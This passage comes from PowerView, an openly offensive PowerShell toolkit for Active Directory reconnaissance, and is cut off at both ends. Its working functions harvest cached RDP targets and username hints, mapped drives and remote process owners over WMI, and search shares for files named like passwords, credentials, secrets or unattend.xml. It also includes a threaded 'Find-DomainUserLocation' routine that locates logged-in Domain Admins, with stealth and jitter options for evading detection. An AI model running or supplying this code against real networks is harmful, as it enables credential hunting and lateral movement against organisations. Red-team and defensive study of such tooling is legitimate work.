$ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames
ForEach ($Connection in $ConnectionKeys) {
# make sure this key is a cached connection
if ($Connection -match 'MRU.*') {
$TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue
$FoundConnection = New-Object PSObject
$FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
$FoundConnection | Add-Member Noteproperty 'UserName' $UserName
$FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
$FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer
$FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null
$FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
$FoundConnection
}
}
# pull out all the cached server info with username hints
$ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames
ForEach ($Server in $ServerKeys) {
$UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue
$FoundConnection = New-Object PSObject
$FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
$FoundConnection | Add-Member Noteproperty 'UserName' $UserName
$FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
$FoundConnection | Add-Member Noteproperty 'TargetServer' $Server
$FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint
$FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
$FoundConnection
}
}
catch {
Write-Verbose "[Get-WMIRegCachedRDPConnection] Error: $_"
}
}
}
catch {
Write-Warning "[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
}
}
}
}
function Get-WMIRegMountedDrive {
<#
.SYNOPSIS
Returns information about saved network mounted drives for the local (or remote) machine.
Note: This function requires administrative rights on the machine you're enumerating.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: ConvertFrom-SID
.DESCRIPTION
Uses remote registry functionality to enumerate recently mounted network drives.
.PARAMETER ComputerName
Specifies the hostname to query for mounted drive information (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connecting to the remote system.
.EXAMPLE
Get-WMIRegMountedDrive
Returns the saved network mounted drives for the local machine.
.EXAMPLE
Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
.EXAMPLE
Get-DomainComputer | Get-WMIRegMountedDrive
Returns the saved network mounted drives for all machines in the domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
.OUTPUTS
PowerView.RegMountedDrive
A PSCustomObject containing the ComputerName and mounted drive information.
#>
[OutputType('PowerView.RegMountedDrive')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
ForEach ($Computer in $ComputerName) {
# HKEY_USERS
$HKU = 2147483651
$WmiArguments = @{
'List' = $True
'Class' = 'StdRegProv'
'Namespace' = 'root\default'
'Computername' = $Computer
'ErrorAction' = 'Stop'
}
if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
try {
$Reg = Get-WmiObject @WmiArguments
# extract out the SIDs of domain users in this hive
$UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
ForEach ($UserSID in $UserSIDs) {
try {
if ($PSBoundParameters['Credential']) {
$UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
}
else {
$UserName = ConvertFrom-SID -ObjectSid $UserSID
}
$DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames
ForEach ($DriveLetter in $DriveLetters) {
$ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue
$RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue
$DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue
if (-not $UserName) { $UserName = '' }
if ($RemotePath -and ($RemotePath -ne '')) {
$MountedDrive = New-Object PSObject
$MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer
$MountedDrive | Add-Member Noteproperty 'UserName' $UserName
$MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID
$MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter
$MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName
$MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath
$MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName
$MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive')
$MountedDrive
}
}
}
catch {
Write-Verbose "[Get-WMIRegMountedDrive] Error: $_"
}
}
}
catch {
Write-Warning "[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
}
}
}
}
function Get-WMIProcess {
<#
.SYNOPSIS
Returns a list of processes and their owners on the local or remote machine.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
including the owners of the particular process.
.PARAMETER ComputerName
Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
Defaults to 'localhost'.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system.
.EXAMPLE
Get-WMIProcess -ComputerName WINDOWS1
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
.OUTPUTS
PowerView.UserProcess
A PSCustomObject containing the remote process information.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.UserProcess')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
[String[]]
$ComputerName = 'localhost',
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
PROCESS {
ForEach ($Computer in $ComputerName) {
try {
$WmiArguments = @{
'ComputerName' = $ComputerName
'Class' = 'Win32_process'
}
if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
Get-WMIobject @WmiArguments | ForEach-Object {
$Owner = $_.getowner();
$Process = New-Object PSObject
$Process | Add-Member Noteproperty 'ComputerName' $Computer
$Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName
$Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID
$Process | Add-Member Noteproperty 'Domain' $Owner.Domain
$Process | Add-Member Noteproperty 'User' $Owner.User
$Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess')
$Process
}
}
catch {
Write-Verbose "[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_"
}
}
}
}
function Find-InterestingFile {
<#
.SYNOPSIS
Searches for files on the given path that match a series of specified criteria.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
.DESCRIPTION
This function recursively searches a given UNC path for files with
specific keywords in the name (default of pass, sensitive, secret, admin,
login and unattend*.xml). By default, hidden files/folders are included
in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
is used to temporarily map the remote share.
.PARAMETER Path
UNC/local path to recursively search.
.PARAMETER Include
Only return files/folders that match the specified array of strings,
i.e. @(*.doc*, *.xls*, *.ppt*)
.PARAMETER LastAccessTime
Only return files with a LastAccessTime greater than this date value.
.PARAMETER LastWriteTime
Only return files with a LastWriteTime greater than this date value.
.PARAMETER CreationTime
Only return files with a CreationTime greater than this date value.
.PARAMETER OfficeDocs
Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
.PARAMETER FreshEXEs
Switch. Find .EXEs accessed within the last 7 days.
.PARAMETER ExcludeFolders
Switch. Exclude folders from the search results.
.PARAMETER ExcludeHidden
Switch. Exclude hidden files and folders from the search results.
.PARAMETER CheckWriteAccess
Switch. Only returns files the current user has write access to.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
to connect to remote systems for file enumeration.
.EXAMPLE
Find-InterestingFile -Path "C:\Backup\"
Returns any files on the local path C:\Backup\ that have the default
search term set in the title.
.EXAMPLE
Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
Returns any files on the remote path \\WINDOWS7\Users\ that have the default
search term set in the title and were accessed within the last week.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-InterestingFile -Credential $Cred -Path "\\PRIMARY.testlab.local\C$\Temp\"
.OUTPUTS
PowerView.FoundFile
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.FoundFile')]
[CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[String[]]
$Path = '.\',
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[Alias('SearchTerms', 'Terms')]
[String[]]
$Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[DateTime]
$LastAccessTime,
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[DateTime]
$LastWriteTime,
[Parameter(ParameterSetName = 'FileSpecification')]
[ValidateNotNullOrEmpty()]
[DateTime]
$CreationTime,
[Parameter(ParameterSetName = 'OfficeDocs')]
[Switch]
$OfficeDocs,
[Parameter(ParameterSetName = 'FreshEXEs')]
[Switch]
$FreshEXEs,
[Parameter(ParameterSetName = 'FileSpecification')]
[Switch]
$ExcludeFolders,
[Parameter(ParameterSetName = 'FileSpecification')]
[Switch]
$ExcludeHidden,
[Switch]
$CheckWriteAccess,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{
'Recurse' = $True
'ErrorAction' = 'SilentlyContinue'
'Include' = $Include
}
if ($PSBoundParameters['OfficeDocs']) {
$SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')
}
elseif ($PSBoundParameters['FreshEXEs']) {
# find .exe's accessed within the last 7 days
$LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy')
$SearcherArguments['Include'] = @('*.exe')
}
$SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden']
$MappedComputers = @{}
function Test-Write {
# short helper to check is the current user can write to a file
[CmdletBinding()]Param([String]$Path)
try {
$Filetest = [IO.File]::OpenWrite($Path)
$Filetest.Close()
$True
}
catch {
$False
}
}
}
PROCESS {
ForEach ($TargetPath in $Path) {
if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
$HostComputer = (New-Object System.Uri($TargetPath)).Host
if (-not $MappedComputers[$HostComputer]) {
# map IPC$ to this computer if it's not already
Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
$MappedComputers[$HostComputer] = $True
}
}
$SearcherArguments['Path'] = $TargetPath
Get-ChildItem @SearcherArguments | ForEach-Object {
# check if we're excluding folders
$Continue = $True
if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) {
Write-Verbose "Excluding: $($_.FullName)"
$Continue = $False
}
if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) {
$Continue = $False
}
if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) {
$Continue = $False
}
if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) {
$Continue = $False
}
if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) {
$Continue = $False
}
if ($Continue) {
$FileParams = @{
'Path' = $_.FullName
'Owner' = $((Get-Acl $_.FullName).Owner)
'LastAccessTime' = $_.LastAccessTime
'LastWriteTime' = $_.LastWriteTime
'CreationTime' = $_.CreationTime
'Length' = $_.Length
}
$FoundFile = New-Object -TypeName PSObject -Property $FileParams
$FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile')
$FoundFile
}
}
}
}
END {
# remove the IPC$ mappings
$MappedComputers.Keys | Remove-RemoteConnection
}
}
########################################################
#
# 'Meta'-functions start below
#
########################################################
function New-ThreadedFunction {
# Helper used by any threaded host enumeration functions
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[String[]]
$ComputerName,
[Parameter(Position = 1, Mandatory = $True)]
[System.Management.Automation.ScriptBlock]
$ScriptBlock,
[Parameter(Position = 2)]
[Hashtable]
$ScriptParameters,
[Int]
[ValidateRange(1, 100)]
$Threads = 20,
[Switch]
$NoImports
)
BEGIN {
# Adapted from:
# http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/
$SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
# # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()
# force a single-threaded apartment state (for token-impersonation stuffz)
$SessionState.ApartmentState = [System.Threading.ApartmentState]::STA
# import the current session state's variables and functions so the chained PowerView
# functionality can be used by the threaded blocks
if (-not $NoImports) {
# grab all the current variables for this runspace
$MyVars = Get-Variable -Scope 2
# these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice
$VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true')
# add Variables from Parent Scope (current runspace) into the InitialSessionState
ForEach ($Var in $MyVars) {
if ($VorbiddenVars -NotContains $Var.Name) {
$SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes))
}
}
# add Functions from current runspace to the InitialSessionState
ForEach ($Function in (Get-ChildItem Function:)) {
$SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition))
}
}
# threading adapted from
# https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407
# Thanks Carlos!
# create a pool of maxThread runspaces
$Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)
$Pool.Open()
# do some trickery to get the proper BeginInvoke() method that allows for an output queue
$Method = $Null
ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) {
$MethodParameters = $M.GetParameters()
if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') {
$Method = $M.MakeGenericMethod([Object], [Object])
break
}
}
$Jobs = @()
$ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()}
Write-Verbose "[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)"
# partition all hosts from -ComputerName into $Threads number of groups
if ($Threads -ge $ComputerName.Length) {
$Threads = $ComputerName.Length
}
$ElementSplitSize = [Int]($ComputerName.Length/$Threads)
$ComputerNamePartitioned = @()
$Start = 0
$End = $ElementSplitSize
for($i = 1; $i -le $Threads; $i++) {
$List = New-Object System.Collections.ArrayList
if ($i -eq $Threads) {
$End = $ComputerName.Length
}
$List.AddRange($ComputerName[$Start..($End-1)])
$Start += $ElementSplitSize
$End += $ElementSplitSize
$ComputerNamePartitioned += @(,@($List.ToArray()))
}
Write-Verbose "[New-ThreadedFunction] Total number of threads/partitions: $Threads"
ForEach ($ComputerNamePartition in $ComputerNamePartitioned) {
# create a "powershell pipeline runner"
$PowerShell = [PowerShell]::Create()
$PowerShell.runspacepool = $Pool
# add the script block + arguments with the given computer partition
$Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition)
if ($ScriptParameters) {
ForEach ($Param in $ScriptParameters.GetEnumerator()) {
$Null = $PowerShell.AddParameter($Param.Name, $Param.Value)
}
}
# create the output queue
$Output = New-Object Management.Automation.PSDataCollection[Object]
# kick off execution using the BeginInvok() method that allows queues
$Jobs += @{
PS = $PowerShell
Output = $Output
Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output))
}
}
}
END {
Write-Verbose "[New-ThreadedFunction] Threads executing"
# continuously loop through each job queue, consuming output as appropriate
Do {
ForEach ($Job in $Jobs) {
$Job.Output.ReadAll()
}
Start-Sleep -Seconds 1
}
While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0)
$SleepSeconds = 100
Write-Verbose "[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup..."
# cleanup- make sure we didn't miss anything
for ($i=0; $i -lt $SleepSeconds; $i++) {
ForEach ($Job in $Jobs) {
$Job.Output.ReadAll()
$Job.PS.Dispose()
}
Start-Sleep -S 1
}
$Pool.Dispose()
Write-Verbose "[New-ThreadedFunction] all threads completed"
}
}
function Find-DomainUserLocation {
<#
.SYNOPSIS
Finds domain machines where specific users are logged into.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction
.DESCRIPTION
This function enumerates all machines on the current (or specified) domain
using Get-DomainComputer, and queries the domain for users of a specified group
(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
The found user list is compared against the target list, and any matches are
displayed. If -ShowAll is specified, all results are displayed instead of
the filtered set. If -Stealth is specified, then likely highly-trafficed servers
are enumerated with Get-DomainFileServer/Get-DomainController, and session
enumeration is executed only against those servers. If -Credential is passed,
then Invoke-UserImpersonation is used to impersonate the specified user
before enumeration, reverting after with Invoke-RevertToSelf.
.PARAMETER ComputerName
Specifies an array of one or more hosts to enumerate, passable on the pipeline.
If -ComputerName is not passed, the default behavior is to enumerate all machines
in the domain returned by Get-DomainComputer.
.PARAMETER Domain
Specifies the domain to query for computers AND users, defaults to the current domain.
.PARAMETER ComputerDomain
Specifies the domain to query for computers, defaults to the current domain.
.PARAMETER ComputerLDAPFilter
Specifies an LDAP query string that is used to search for computer objects.
.PARAMETER ComputerSearchBase
Specifies the LDAP source to search through for computers,
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER ComputerUnconstrained
Switch. Search computer objects that have unconstrained delegation.
.PARAMETER ComputerOperatingSystem
Search computers with a specific operating system, wildcards accepted.
.PARAMETER ComputerServicePack
Search computers with a specific service pack, wildcards accepted.
.PARAMETER ComputerSiteName
Search computers in the specific AD Site name, wildcards accepted.
.PARAMETER UserIdentity
Specifies one or more user identities to search for.
.PARAMETER UserDomain
Specifies the domain to query for users to search for, defaults to the current domain.
.PARAMETER UserLDAPFilter
Specifies an LDAP query string that is used to search for target users.
.PARAMETER UserSearchBase
Specifies the LDAP source to search through for target users.
e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
.PARAMETER UserGroupIdentity
Specifies a group identity to query for target users, defaults to 'Domain Admins.
If any other user specifications are set, then UserGroupIdentity is ignored.
.PARAMETER UserAdminCount
Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
.PARAMETER UserAllowDelegation
Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
.PARAMETER CheckAccess
Switch. Check if the current user has local admin access to computers where target users are found.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain and target systems.
.PARAMETER StopOnSuccess
Switch. Stop hunting after finding after finding a target user.
.PARAMETER Delay
Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.PARAMETER ShowAll
Switch. Return all user location results instead of filtering based on target
specifications.
.PARAMETER Stealth
Switch. Only enumerate sessions from connonly used target servers.
.PARAMETER StealthSource
The source of target servers to use, 'DFS' (distributed file servers),
'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
.PARAMETER Threads
The number of threads to use for user searching, defaults to 20.
.EXAMPLE
Find-DomainUserLocation
Searches for 'Domain Admins' by enumerating every computer in the domain.
.EXAMPLE
Find-DomainUserLocation -Stealth -ShowAll
Enumerates likely highly-trafficked servers, performs just session enumeration
against each, and outputs all results.
.EXAMPLE
Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
users in dev.testlab.local.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-DomainUserLocation -Domain testlab.local -Credential $Cred
Searches for domain admin locations in the testlab.local using the specified alternate credentials.
.OUTPUTS
PowerView.UserLocation
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.UserLocation')]
[CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DNSHostName')]
[String[]]
$ComputerName,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerDomain,
[ValidateNotNullOrEmpty()]
[String]
$ComputerLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$ComputerSearchBase,
[Alias('Unconstrained')]
[Switch]
$ComputerUnconstrained,
[ValidateNotNullOrEmpty()]
[Alias('OperatingSystem')]
[String]
$ComputerOperatingSystem,
[ValidateNotNullOrEmpty()]
[Alias('ServicePack')]
[String]
$ComputerServicePack,
[ValidateNotNullOrEmpty()]
[Alias('SiteName')]
[String]
$ComputerSiteName,
[Parameter(ParameterSetName = 'UserIdentity')]
[ValidateNotNullOrEmpty()]
[String[]]
$UserIdentity,
[ValidateNotNullOrEmpty()]
[String]
$UserDomain,
[ValidateNotNullOrEmpty()]
[String]
$UserLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$UserSearchBase,
[Parameter(ParameterSetName = 'UserGroupIdentity')]
[ValidateNotNullOrEmpty()]
[Alias('GroupName', 'Group')]
[String[]]
$UserGroupIdentity = 'Domain Admins',
[Alias('AdminCount')]
[Switch]
$UserAdminCount,
[Alias('AllowDelegation')]
[Switch]
$UserAllowDelegation,
[Switch]
$CheckAccess,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$StopOnSuccess,
[ValidateRange(1, 10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Parameter(ParameterSetName = 'ShowAll')]
[Switch]
$ShowAll,
[Switch]
$Stealth,
[String]
[ValidateSet('DFS', 'DC', 'File', 'All')]
$StealthSource = 'All',
[Int]
[ValidateRange(1, 100)]
$Threads = 20
)
BEGIN {
$ComputerSearcherArguments = @{
'Properties' = 'dnshostname'
}
if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
$UserSearcherArguments = @{
'Properties' = 'samaccountname'
}
if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation }
if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
$TargetComputers = @()
# first, build the set of computers to enumerate
if ($PSBoundParameters['ComputerName']) {
$TargetComputers = @($ComputerName)
}
else {
if ($PSBoundParameters['Stealth']) {
Write-Verbose "[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource"
$TargetComputerArrayList = New-Object System.Collections.ArrayList
if ($StealthSource -match 'File|All') {
Write-Verbose '[Find-DomainUserLocation] Querying for file servers'
$FileServerSearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain }
if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase }
if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential }
